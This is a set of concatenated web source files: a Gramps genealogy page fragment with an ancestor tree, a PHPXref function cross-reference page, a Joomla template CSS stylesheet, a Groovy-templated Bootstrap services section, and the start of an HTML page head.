<a href="../../../ppl/x/f/ZP2KQCYV4DVF375TFX.html">Lachance, Helen<span class="grampsid"> [I0484]</span></a>
<ol>
<li>
<a href="../../../ppl/w/e/CU2KQCSM52TSK38XEW.html">Thornton, Phillip James<span class="grampsid"> [I0490]</span></a>
</li>
</ol>
</li>
</ol>
</li>
<li>
<a href="../../../ppl/2/s/UXXJQC113PYFEWQAS2.html">Thornton, Dorothy Eleanor<span class="grampsid"> [I0207]</span></a>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</div>
<div class="subsection" id="tree">
<h4>Ancestors</h4>
<div id="treeContainer" style="width:735px; height:602px;">
<div class="boxbg male AncCol0" style="top: 269px; left: 6px;">
<a class="noThumb" href="../../../ppl/p/0/NWXJQC0OQB26BHRX0P.html">
Thornton, James Arthur
</a>
</div>
<div class="shadow" style="top: 274px; left: 10px;"></div>
<div class="bvline" style="top: 301px; left: 165px; width: 15px"></div>
<div class="gvline" style="top: 306px; left: 165px; width: 20px"></div>
<div class="boxbg male AncCol1" style="top: 119px; left: 196px;">
<a class="noThumb" href="../../../ppl/2/o/5WXJQCRB8V835ESO2.html">
Thornton, Arthur Otto
</a>
</div>
<div class="shadow" style="top: 124px; left: 200px;"></div>
<div class="bvline" style="top: 151px; left: 180px; width: 15px;"></div>
<div class="gvline" style="top: 156px; left: 185px; width: 20px;"></div>
<div class="bhline" style="top: 151px; left: 180px; height: 150px;"></div>
<div class="gvline" style="top: 156px; left: 185px; height: 150px;"></div>
<div class="boxbg female AncCol1" style="top: 419px; left: 196px;">
<a class="noThumb" href="../../../ppl/8/b/VUXJQCE48G4ZOGERB8.html">
Marín, Lilla Estella
</a>
</div>
<div class="shadow" style="top: 424px; left: 200px;"></div>
<div class="bvline" style="top: 451px; left: 180px; width: 15px;"></div>
<div class="gvline" style="top: 456px; left: 185px; width: 20px;"></div>
<div class="bhline" style="top: 301px; left: 180px; height: 150px;"></div>
<div class="gvline" style="top: 306px; left: 185px; height: 150px;"></div>
<div class="bvline" style="top: 451px; left: 355px; width: 15px"></div>
<div class="gvline" style="top: 456px; left: 355px; width: 20px"></div>
<div class="boxbg male AncCol2" style="top: 344px; left: 386px;">
<a class="noThumb" href="../../../ppl/a/a/6SUJQCGVZIXW06TJAA.html">
Marín, Moses Wallace
</a>
</div>
<div class="shadow" style="top: 349px; left: 390px;"></div>
<div class="bvline" style="top: 376px; left: 370px; width: 15px;"></div>
<div class="gvline" style="top: 381px; left: 375px; width: 20px;"></div>
<div class="bhline" style="top: 376px; left: 370px; height: 75px;"></div>
<div class="gvline" style="top: 381px; left: 375px; height: 75px;"></div>
<div class="bvline" style="top: 376px; left: 545px; width: 15px"></div>
<div class="gvline" style="top: 381px; left: 545px; width: 20px"></div>
<div class="boxbg male AncCol3" style="top: 307px; left: 576px;">
<a class="noThumb" href="../../../ppl/a/r/USVJQCRNPF251FM0RA.html">
Marín, Alfred Franklin(Frank)
</a>
</div>
<div class="shadow" style="top: 312px; left: 580px;"></div>
<div class="bvline" style="top: 339px; left: 560px; width: 15px;"></div>
<div class="gvline" style="top: 344px; left: 565px; width: 20px;"></div>
<div class="bhline" style="top: 339px; left: 560px; height: 37px;"></div>
<div class="gvline" style="top: 344px; left: 565px; height: 37px;"></div>
<div class="boxbg female AncCol3" style="top: 381px; left: 576px;">
<a class="noThumb" href="../../../ppl/m/f/ZTVJQCTSMI85EGMXFM.html">
Floyd, Martha Frances "Fannie"
</a>
</div>
<div class="shadow" style="top: 386px; left: 580px;"></div>
<div class="bvline" style="top: 413px; left: 560px; width: 15px;"></div>
<div class="gvline" style="top: 418px; left: 565px; width: 20px;"></div>
<div class="bhline" style="top: 376px; left: 560px; height: 37px;"></div>
<div class="gvline" style="top: 381px; left: 565px; height: 37px;"></div>
<div class="boxbg female AncCol2" style="top: 494px; left: 386px;">
<a class="noThumb" href="../../../ppl/t/m/2TUJQCSU5Q8MZ915MT.html">
Landry, Eleanor (Nellie) Therese
</a>
</div>
<div class="shadow" style="top: 499px; left: 390px;"></div>
<div class="bvline" style="top: 526px; left: 370px; width: 15px;"></div>
<div class="gvline" style="top: 531px; left: 375px; width: 20px;"></div>
<div class="bhline" style="top: 451px; left: 370px; height: 75px;"></div>
<div class="gvline" style="top: 456px; left: 375px; height: 75px;"></div>
<div class="bvline" style="top: 526px; left: 545px; width: 15px"></div>
<div class="gvline" style="top: 531px; left: 545px; width: 20px"></div>
<div class="boxbg male AncCol3" style="top: 457px; left: 576px;">
<a class="noThumb" href="../../../ppl/a/m/0XVJQCJUNJY40WDSMA.html">
Fernandez, Thomas
</a>
</div>
<div class="shadow" style="top: 462px; left: 580px;"></div>
<div class="bvline" style="top: 489px; left: 560px; width: 15px;"></div>
<div class="gvline" style="top: 494px; left: 565px; width: 20px;"></div>
<div class="bhline" style="top: 489px; left: 560px; height: 37px;"></div>
<div class="gvline" style="top: 494px; left: 565px; height: 37px;"></div>
<div class="boxbg female AncCol3" style="top: 531px; left: 576px;">
<a class="noThumb" href="../../../ppl/o/j/1YVJQCEEWSNHIZBIJO.html">
Ortega, Catherine
</a>
</div>
<div class="shadow" style="top: 536px; left: 580px;"></div>
<div class="bvline" style="top: 563px; left: 560px; width: 15px;"></div>
<div class="gvline" style="top: 568px; left: 565px; width: 20px;"></div>
<div class="bhline" style="top: 526px; left: 560px; height: 37px;"></div>
<div class="gvline" style="top: 531px; left: 565px; height: 37px;"></div>
</div>
</div>
<div class="subsection" id="sourcerefs">
<h4>Source References</h4>
<ol>
<li>
<a href="../../../src/x/a/X5TJQC9JXU4RKT6VAX.html" title="Import from test2.ged" name ="sref1">
Import from test2.ged
<span class="grampsid"> [S0003]</span>
</a>
</li>
</ol>
</div>
</div>
<div class="fullclear"></div>
<div id="footer">
<p id="createdate">
Generated by <a href="http://gramps-project.org/">Gramps</a> 4.2.2 on 2015-12-25<br />Last change was the 2007-07-26 08:34:25
</p>
<p id="copyright">
</p>
</div>
</body>
</html>
|
_functions/isempty.html | mgsolipa/b2evolution_phpxref | <!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>PHPXRef 0.7.1 : Unnamed Project : Function Reference: isempty()</title>
<link rel="stylesheet" href="../sample.css" type="text/css">
<link rel="stylesheet" href="../sample-print.css" type="text/css" media="print">
<style id="hilight" type="text/css"></style>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
</head>
<body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff">
<table class="pagetitle" width="100%">
<tr>
<td valign="top" class="pagetitle">
[ <a href="../index.html">Index</a> ]
</td>
<td align="right" class="pagetitle">
<h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2>
</td>
</tr>
</table>
<!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 -->
<!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net -->
<!-- http://phpxref.sourceforge.net/ -->
<script src="../phpxref.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript">
<!--
ext='.html';
relbase='../';
subdir='_functions';
filename='index.html';
cookiekey='phpxref';
handleNavFrame(relbase, subdir, filename);
logFunction('isempty');
// -->
</script>
<script language="JavaScript" type="text/javascript">
if (gwGetCookie('xrefnav')=='off')
document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>');
else
document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>');
</script>
<noscript>
<p class="navlinks">
[ <a href="../nav.html" target="_top">Show Explorer</a> ]
[ <a href="index.html" target="_top">Hide Navbar</a> ]
</p>
</noscript>
[<a href="../index.html">Top level directory</a>]<br>
<script language="JavaScript" type="text/javascript">
<!--
document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>');
document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">');
document.writeln('<tr><td class="searchbox-title">');
document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>');
document.writeln('<\/td><\/tr>');
document.writeln('<tr><td class="searchbox-body" id="searchbox-body">');
document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>');
document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="classname"><br>');
document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="funcname"><br>');
document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="varname"><br>');
document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="constname"><br>');
document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="tablename"><br>');
document.writeln('<input type="submit" class="searchbox-button" value="Search">');
document.writeln('<\/form>');
document.writeln('<\/td><\/tr><\/table>');
document.writeln('<\/td><\/tr><\/table>');
// -->
</script>
<div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div>
<h3>Function and Method Cross Reference</h3>
<h2><a href="index.html#isempty">isempty()</a></h2>
<b>Defined at:</b><ul>
<li><a href="../inc/_core/model/_diff.class.php.html#isempty">/inc/_core/model/_diff.class.php</a> -> <a onClick="logFunction('isempty', '/inc/_core/model/_diff.class.php.source.html#l628')" href="../inc/_core/model/_diff.class.php.source.html#l628"> line 628</a></li>
<li><a href="../inc/_ext/phpsvnclient/ext/Diff/Diff.php.html#isempty">/inc/_ext/phpsvnclient/ext/Diff/Diff.php</a> -> <a onClick="logFunction('isempty', '/inc/_ext/phpsvnclient/ext/Diff/Diff.php.source.html#l137')" href="../inc/_ext/phpsvnclient/ext/Diff/Diff.php.source.html#l137"> line 137</a></li>
<li><a href="../inc/_ext/phpsvnclient/ext/Diff/Diff/ThreeWay.php.html#isempty">/inc/_ext/phpsvnclient/ext/Diff/Diff/ThreeWay.php</a> -> <a onClick="logFunction('isempty', '/inc/_ext/phpsvnclient/ext/Diff/Diff/ThreeWay.php.source.html#l251')" href="../inc/_ext/phpsvnclient/ext/Diff/Diff/ThreeWay.php.source.html#l251"> line 251</a></li>
<li><a href="../inc/_ext/phpsvnclient/ext/Diff/Diff3.php.html#isempty">/inc/_ext/phpsvnclient/ext/Diff/Diff3.php</a> -> <a onClick="logFunction('isempty', '/inc/_ext/phpsvnclient/ext/Diff/Diff3.php.source.html#l251')" href="../inc/_ext/phpsvnclient/ext/Diff/Diff3.php.source.html#l251"> line 251</a></li>
</ul>
<b>Referenced 38 times:</b><ul>
<li><a href="../rsc/js/bootstrap/typeahead.bundle.js.html">/rsc/js/bootstrap/typeahead.bundle.js</a> -> <a href="../rsc/js/bootstrap/typeahead.bundle.js.source.html#l1152"> line 1152</a></li>
<li><a href="../rsc/js/bootstrap/typeahead.bundle.js.html">/rsc/js/bootstrap/typeahead.bundle.js</a> -> <a href="../rsc/js/bootstrap/typeahead.bundle.js.source.html#l1217"> line 1217</a></li>
<li><a href="../rsc/js/bootstrap/typeahead.bundle.min.js.html">/rsc/js/bootstrap/typeahead.bundle.min.js</a> -> <a href="../rsc/js/bootstrap/typeahead.bundle.min.js.source.html#l7"> line 7</a></li>
<li><a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.html">/rsc/js/tiny_mce/plugins/lists/plugin.min.js</a> -> <a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.source.html#l1"> line 1</a></li>
<li><a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.html">/rsc/js/tiny_mce/plugins/lists/plugin.min.js</a> -> <a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.source.html#l1"> line 1</a></li>
<li><a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.html">/rsc/js/tiny_mce/plugins/lists/plugin.min.js</a> -> <a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.source.html#l1"> line 1</a></li>
<li><a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.html">/rsc/js/tiny_mce/plugins/lists/plugin.min.js</a> -> <a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.source.html#l1"> line 1</a></li>
<li><a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.html">/rsc/js/tiny_mce/plugins/lists/plugin.min.js</a> -> <a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.source.html#l1"> line 1</a></li>
<li><a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.html">/rsc/js/tiny_mce/plugins/lists/plugin.min.js</a> -> <a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.source.html#l1"> line 1</a></li>
<li><a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.html">/rsc/js/tiny_mce/plugins/lists/plugin.min.js</a> -> <a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.source.html#l1"> line 1</a></li>
<li><a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.html">/rsc/js/tiny_mce/plugins/lists/plugin.min.js</a> -> <a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.source.html#l1"> line 1</a></li>
<li><a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.html">/rsc/js/tiny_mce/plugins/lists/plugin.min.js</a> -> <a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.source.html#l1"> line 1</a></li>
<li><a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.html">/rsc/js/tiny_mce/plugins/lists/plugin.min.js</a> -> <a href="../rsc/js/tiny_mce/plugins/lists/plugin.min.js.source.html#l1"> line 1</a></li>
<li><a href="../rsc/js/videojs/video.js.html">/rsc/js/videojs/video.js</a> -> <a href="../rsc/js/videojs/video.js.source.html#l455"> line 455</a></li>
<li><a href="../rsc/js/videojs/video.js.html">/rsc/js/videojs/video.js</a> -> <a href="../rsc/js/videojs/video.js.source.html#l466"> line 466</a></li>
<li><a href="../rsc/js/videojs/video.js.html">/rsc/js/videojs/video.js</a> -> <a href="../rsc/js/videojs/video.js.source.html#l948"> line 948</a></li>
<li><a href="../rsc/js/videojs/video.js.html">/rsc/js/videojs/video.js</a> -> <a href="../rsc/js/videojs/video.js.source.html#l9522"> line 9522</a></li>
<li><a href="../inc/_ext/phpsvnclient/ext/Diff/Diff/ThreeWay.php.html">/inc/_ext/phpsvnclient/ext/Diff/Diff/ThreeWay.php</a> -> <a href="../inc/_ext/phpsvnclient/ext/Diff/Diff/ThreeWay.php.source.html#l258"> line 258</a></li>
<li><a href="../inc/_ext/phpsvnclient/ext/Diff/Diff3.php.html">/inc/_ext/phpsvnclient/ext/Diff/Diff3.php</a> -> <a href="../inc/_ext/phpsvnclient/ext/Diff/Diff3.php.source.html#l258"> line 258</a></li>
<li><a href="../rsc/js/tiny_mce/tinymce.min.js.html">/rsc/js/tiny_mce/tinymce.min.js</a> -> <a href="../rsc/js/tiny_mce/tinymce.min.js.source.html#l4"> line 4</a></li>
<li><a href="../rsc/js/tiny_mce/tinymce.min.js.html">/rsc/js/tiny_mce/tinymce.min.js</a> -> <a href="../rsc/js/tiny_mce/tinymce.min.js.source.html#l4"> line 4</a></li>
<li><a href="../rsc/js/tiny_mce/tinymce.min.js.html">/rsc/js/tiny_mce/tinymce.min.js</a> -> <a href="../rsc/js/tiny_mce/tinymce.min.js.source.html#l4"> line 4</a></li>
<li><a href="../rsc/js/tiny_mce/tinymce.min.js.html">/rsc/js/tiny_mce/tinymce.min.js</a> -> <a href="../rsc/js/tiny_mce/tinymce.min.js.source.html#l5"> line 5</a></li>
<li><a href="../rsc/js/tiny_mce/tinymce.min.js.html">/rsc/js/tiny_mce/tinymce.min.js</a> -> <a href="../rsc/js/tiny_mce/tinymce.min.js.source.html#l5"> line 5</a></li>
<li><a href="../rsc/js/tiny_mce/tinymce.min.js.html">/rsc/js/tiny_mce/tinymce.min.js</a> -> <a href="../rsc/js/tiny_mce/tinymce.min.js.source.html#l5"> line 5</a></li>
<li><a href="../rsc/js/tiny_mce/tinymce.min.js.html">/rsc/js/tiny_mce/tinymce.min.js</a> -> <a href="../rsc/js/tiny_mce/tinymce.min.js.source.html#l6"> line 6</a></li>
<li><a href="../rsc/js/tiny_mce/tinymce.min.js.html">/rsc/js/tiny_mce/tinymce.min.js</a> -> <a href="../rsc/js/tiny_mce/tinymce.min.js.source.html#l6"> line 6</a></li>
<li><a href="../rsc/js/tiny_mce/tinymce.min.js.html">/rsc/js/tiny_mce/tinymce.min.js</a> -> <a href="../rsc/js/tiny_mce/tinymce.min.js.source.html#l6"> line 6</a></li>
<li><a href="../rsc/js/tiny_mce/tinymce.min.js.html">/rsc/js/tiny_mce/tinymce.min.js</a> -> <a href="../rsc/js/tiny_mce/tinymce.min.js.source.html#l6"> line 6</a></li>
<li><a href="../rsc/js/tiny_mce/tinymce.min.js.html">/rsc/js/tiny_mce/tinymce.min.js</a> -> <a href="../rsc/js/tiny_mce/tinymce.min.js.source.html#l6"> line 6</a></li>
<li><a href="../rsc/js/tiny_mce/tinymce.min.js.html">/rsc/js/tiny_mce/tinymce.min.js</a> -> <a href="../rsc/js/tiny_mce/tinymce.min.js.source.html#l6"> line 6</a></li>
<li><a href="../rsc/js/tiny_mce/tinymce.min.js.html">/rsc/js/tiny_mce/tinymce.min.js</a> -> <a href="../rsc/js/tiny_mce/tinymce.min.js.source.html#l7"> line 7</a></li>
<li><a href="../rsc/js/tiny_mce/tinymce.min.js.html">/rsc/js/tiny_mce/tinymce.min.js</a> -> <a href="../rsc/js/tiny_mce/tinymce.min.js.source.html#l7"> line 7</a></li>
<li><a href="../rsc/js/tiny_mce/tinymce.min.js.html">/rsc/js/tiny_mce/tinymce.min.js</a> -> <a href="../rsc/js/tiny_mce/tinymce.min.js.source.html#l8"> line 8</a></li>
<li><a href="../rsc/js/tiny_mce/tinymce.min.js.html">/rsc/js/tiny_mce/tinymce.min.js</a> -> <a href="../rsc/js/tiny_mce/tinymce.min.js.source.html#l8"> line 8</a></li>
<li><a href="../rsc/js/tiny_mce/tinymce.min.js.html">/rsc/js/tiny_mce/tinymce.min.js</a> -> <a href="../rsc/js/tiny_mce/tinymce.min.js.source.html#l8"> line 8</a></li>
<li><a href="../rsc/js/tiny_mce/tinymce.min.js.html">/rsc/js/tiny_mce/tinymce.min.js</a> -> <a href="../rsc/js/tiny_mce/tinymce.min.js.source.html#l9"> line 9</a></li>
<li><a href="../rsc/js/tiny_mce/plugins/table/plugin.min.js.html">/rsc/js/tiny_mce/plugins/table/plugin.min.js</a> -> <a href="../rsc/js/tiny_mce/plugins/table/plugin.min.js.source.html#l1"> line 1</a></li>
</ul>
<!-- A link to the phpxref site in your customized footer file is appreciated ;-) -->
<br><hr>
<table width="100%">
<tr><td>Generated: Sat Nov 21 22:13:19 2015</td>
<td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td>
</tr>
</table>
</body></html>
|
templates/gk_storebox/css/typography/typography.style2.css | PageFactoryorg/SherstLen |
/*
#------------------------------------------------------------------------
# Store Box - March Joomla! template (for Joomla 2.5)
#
# Copyright (C) 2007-2013 Gavick.com. All Rights Reserved.
# License: Copyrighted Commercial Software
# Website: http://www.gavick.com
# Support: support@gavick.com
*/
b,
strong {
font-weight: 400
}
.k2box > ul,
.k2box > ul ul {
list-style-type: disc;
padding-left: 20px
}
.k2box > ol,
.k2box > ol ol {
list-style-type: decimal;
padding-left: 20px
}
.k2box > ul li,
.k2box > ul ul li,
.k2box > ol li,
.k2box > ol ol li {
list-style-position: outside;
padding-left: 0
}
.gkfile1,
.gkfile2,
.gklink,
.gkinfo,
.gkpin,
.gksettings,
.gkmic,
.gkbook,
.gkmap,
.gktag,
.gkstats,
.gkvoice,
.gkvideo,
.gklocked,
.gkunlocked,
.gklocation,
.gkcomment,
.gkalarm {
background-position: 0 8px!important;
background-repeat: no-repeat!important;
min-height: 38px!important;
padding: 0 0 2px 52px !important
}
p.gkInfo1,
p.gkTips1,
p.gkWarning1 {
border-top: 2px solid #eee;
border-bottom: 2px solid #eee;
color: #000;
font-weight: 400;
padding: 12px;
text-align: center
}
.gkHighlight1,
.gkHighlight2,
.gkHighlight3,
.gkHighlight4 {
cursor: default;
padding: 1px 5px;
text-shadow: none
}
pre,
.gkCode1,
.gkCode2,
.gkCode3 {
font: normal .92em/32px 'Curier New', monospace!important;
margin: 20px 0!important;
padding: 26px 30px!important;
}
pre,
.gkCode1,
.gkCode2 {
-ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity=100);
filter: alpha(opacity=100);
opacity: 1
}
.gkCode3 {
border: 1px solid #eee;
color: #363636;
padding-left: 82px!important
}
.gkCode3 h4 {
background: #000;
color: #fff;
font-size: 13px;
margin: 0 0 0 -64px !important;
padding: 2px 5px 0;
position: relative;
text-align: center;
top: 0;
width: 35px
}
div.gkCode2:hover,
div.gkCode3:hover {
color: #000
}
ol {
list-style-position: inside;
margin: 2em 0;
padding: 0
}
ol.gkDec {
list-style-type: decimal
}
ol.gkRoman {
list-style-type: upper-roman
}
ol.gkAlpha {
list-style-type: lower-alpha
}
ol.gkDecimalLeadingZero {
list-style-type: decimal-leading-zero
}
ul.gkBullet1,
ul.gkBullet2,
ul.gkBullet3,
ul.gkBullet4,
#k2Container .itemFullText ul,
#k2Container .itemIntroText ul {
margin: 2em 0;
padding: 0
}
ul li {
list-style-position: outside
}
ul.gkBullet1 li,
ul.gkBullet2 li,
ul.gkBullet3 li,
ul.gkBullet4 li,
#k2Container .itemFullText ul li,
#k2Container .itemIntroText ul li {
line-height: 1.8em!important;
list-style: none;
margin: 0!important;
overflow: inherit;
padding: 2px 0 2px 28px
}
div.gkLegend1 h4 {
background: #fff;
float: left;
font-size: 14px;
font-weight: 400;
left: 11px;
line-height: 18px;
margin: 0 0 -9px!important;
padding: 0 10px;
position: relative;
text-transform: uppercase;
top: -16px
}
div.gkLegend1 {
margin: 30px 0;
padding: 6px
}
div.gkLegend1 p {
clear: both;
margin: 7px
}
blockquote {
font-style: italic;
margin: 20px 0
}
blockquote div {
display: block
}
blockquote div.gkBlockquote1 div,
blockquote div.gkBlockquote2 div {
background: url(../../images/style1/typography/close1.png) no-repeat right top;
padding: 0 22px
}
blockquote div.gkBlockquote3 {
background: url(../../images/style1/typography/open2.png) no-repeat left bottom;
padding-bottom: 1px
}
blockquote div.gkBlockquote3 div {
background: url(../../images/style1/typography/close2.png) no-repeat right top;
padding: 5px 48px 0
}
blockquote div.gkBlockquote4 div {
background: url(../../images/style1/typography/close2.png) no-repeat right top;
padding: 0 48px
}
.gkBlockTextLeft,
.gkBlockTextRight,
.gkBlockTextCenter {
color: #242424;
display: block;
font-size: 18px;
font-style: italic;
font-weight: 400;
line-height: 170%;
padding: 30px 40px;
width: 38%
}
.gkBlockTextLeft {
float: left;
padding-left: 0;
text-align: left
}
.gkBlockTextRight {
float: right;
padding-right: 0;
text-align: right
}
.gkBlockTextCenter {
margin: 0 auto;
text-align: center
}
p.numblocks {
margin: 20px 0;
min-height: 56px;
padding: 0 0 24px 75px !important;
position: relative
}
p.numblocks span {
-moz-border-radius: 50%;
-ms-webkit-border-radius: 50%;
-webkit-border-radius: 50%;
border-radius: 50%;
color: #fff;
display: block;
font-size: 24px;
font-weight: 600;
height: 52px;
left: 0;
line-height: 52px;
position: absolute;
text-align: center;
top: 4px;
width: 52px
}
p.num-1 span {
background: #c12f3c;
}
p.num-2 span {
background: #56bfdc;
}
p.num-3 span {
background: #000;
}
p.numblocks span.highlight {
border-right: none;
display: inline;
font-size: 15px;
position: static;
width: auto
}
.gkblock-1,
.gkblock-2,
.gkblock-3 {
margin: 20px 0;
padding: 15px 20px
}
.bubble-1,
.bubble-2 {
margin: 20px 0 40px;
padding: 15px 20px;
position: relative
}
.bubble-1::after,
.bubble-2::after {
border-color: transparent;
border-style: solid;
border-width: 22px 0 0 22px;
bottom: -22px;
content: "";
display: block;
left: 30px;
position: absolute;
width: 0;
}
.bubble-1 cite,
.bubble-2 cite {
bottom: -25px;
display: block;
font-size: 13px;
font-style: normal;
font-weight: 400;
height: 25px;
left: 26px;
line-height: 36px;
padding-left: 32px;
position: absolute
}
blockquote div.gkBlockquote1 {
background: url(../../images/style1/typography/open1.png) no-repeat left bottom
}
blockquote div.gkBlockquote2 {
background: url(../../images/style1/typography/open1.png) no-repeat left top
}
blockquote div.gkBlockquote4 {
background: url(../../images/style1/typography/open2.png) no-repeat left top
}
pre {
border: 1px solid #e5e5e5;
border-left: 4px solid #56bfdc;
color: #363636;
padding-left: 32px
}
.gkCode2 {
border: 1px solid #e5e5e5;
border-top: 4px solid #c12f3c;
color: #363636
}
p.gkInfo1 {
background: #fffdf6;
border-color: #ffe157
}
p.gkTips1 {
background: #fbfaf7;
border-color: #c12f3c
}
p.gkWarning1 {
background: #fff9f7;
border-color: #56bfdc
}
div.gkLegend1 {
border: 4px double #e5e5e5
}
div.gkLegend1 h4 {
background: #fff;
color: #242424
}
.gkHighlight1 {
background: #ffd
}
.gkHighlight4 {
background: #c12f3c;
color: #fff
}
.gkblock-1 {
border: 1px solid #e5e5e5
}
.gkblock-2 {
background: #FFFEF4;
border: 1px solid #EAE8CC
}
.gkblock-3 {
background: #f8f8f8
}
.bubble-1 {
background: #56bfdc;
color: #fff
}
.bubble-1::after {
border-color: #56bfdc;
border-left: 22px solid transparent;
}
.bubble-2 {
background: #000;
color: #fff
}
.bubble-2::after {
border-color: #000;
border-left: 22px solid transparent;
}
.bubble-1 cite {
color: #363636
}
.bubble-2 cite {
color: #000
}
ul.gkBullet1 li,
#k2Container .itemFullText ul li,
#k2Container .itemIntroText ul li {
background: url(../../images/style1/typography/bullet1.png) no-repeat 0 12px!important
}
ul.gkBullet2 li {
background: url(../../images/style1/typography/bullet2.png) no-repeat 0 12px!important
}
ul.gkBullet3 li {
background: url(../../images/style1/typography/bullet3.png) no-repeat 0 12px!important
}
ul.gkBullet4 li {
background: url(../../images/style1/typography/bullet4.png) no-repeat 0 12px!important
}
ul#demo-typography {
background: transparent;
overflow: hidden;
padding: 10px 30px 30px
}
ul#demo-typography li {
color: #cb260a;
float: left;
font-size: 11px;
line-height: 24px;
list-style-position: none;
list-style-type: disc;
width: 23.9%
}
ul#demo-typography li a {
font-size: 11px;
text-shadow: 2px 2px 0 #fff
}
.demo-typoDiv {
clear: both;
margin: 0 0 30px;
overflow: hidden
}
h4.demo-typo {
border-bottom: 1px solid #eee;
color: #363636;
font-size: 20px;
font-weight: 300;
margin: 30px 0;
padding: 0 0 8px
}
.demo-typo-col2 {
float: left;
width: 50%
}
.demo-typo-col3 {
float: left;
width: 33%
}
.demo-typo-col4 {
float: left;
width: 25%
}
.demo-typo_padd {
padding: 0 15px
}
#warnings .demo-typo_padd p {
margin: 1em 0 1.6em
}
.typoDesc small {
color: #999;
font: normal 10px Monaco, Consolas, "Courier News", monospace
}
.gkblock-3 small {
color: #353639!important
}
.bubble-1 small, .bubble-2 small {
color: #fff
}
.gkHighlight3:hover,
.gkHighlight2:hover {
background: #c12f3c;
color: #fff
}
.gkHighlight1:hover,
pre:hover,
.gkCode1:hover {
background: #fff
}
.gkHighlight3,
span.helpTooltip {
background: #56bfdc;
color: #fff
}
.gkHighlight2,
.gkHighlight4:hover {
background: #000;
color: #fff
}
|
theme/includes/services.html | pamplemousseteatime/grains-template | <!-- Services -->
<!-- The circle icons use Font Awesome's stacked icon classes. For more information, visit http://fontawesome.io/examples/ -->
<section id="services" class="services bg-primary">
<div class="container">
<div class="row text-center">
<div class="col-lg-10 col-lg-offset-1">
<h2>${page.services.title}</h2>
<hr class="small">
<div class="row">
<% page.services.types.each { type -> %>
<div class="col-md-3 col-sm-6">
<div class="service-item">
<a href="#${type.modal}" style="color: white;" data-toggle="modal">
<span class="fa-stack fa-4x">
<i class="fa fa-circle fa-stack-2x"></i>
<i class="fa ${type.image} fa-stack-1x text-primary"></i>
</span>
</a>
<h4>
<strong>${type.name}</strong>
</h4>
<p>${type.text}</p>
<a href="#${type.modal}" class="btn btn-light" data-toggle="modal">En savoir plus</a>
</div>
</div>
<% } %>
</div>
<!-- /.row (nested) -->
</div>
<!-- /.col-lg-10 -->
</div>
<!-- /.row -->
</div>
<!-- /.container -->
</section>
<!-- Service Modals -->
<% page.services.modals.each { modal -> %>
<div class="portfolio-modal modal fade" id="${modal.id}" tabindex="-1" role="dialog" aria-hidden="true">
<div class="modal-content">
<div class="close-modal" data-dismiss="modal">
<div class="lr">
<div class="rl">
</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-lg-8 col-lg-offset-2">
<div class="modal-body">
<h2>${modal.title}</h2>
<hr class="star-primary">
<img src="${modal.image}" class="img-responsive img-centered" alt="">
<p>${modal.text}</p>
<button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i> Fermer</button>
</div>
</div>
</div>
</div>
</div>
</div>
<% } %>
|
submitImages3-3.html | JustifiedArt/justified-art | <!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
Remove this if you use the .htaccess -->
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>submit</title>
<meta name="description" content="">
<meta name="author" content="nlyell">
<meta name="viewport" content="width=device-width; initial-scale=1.0">
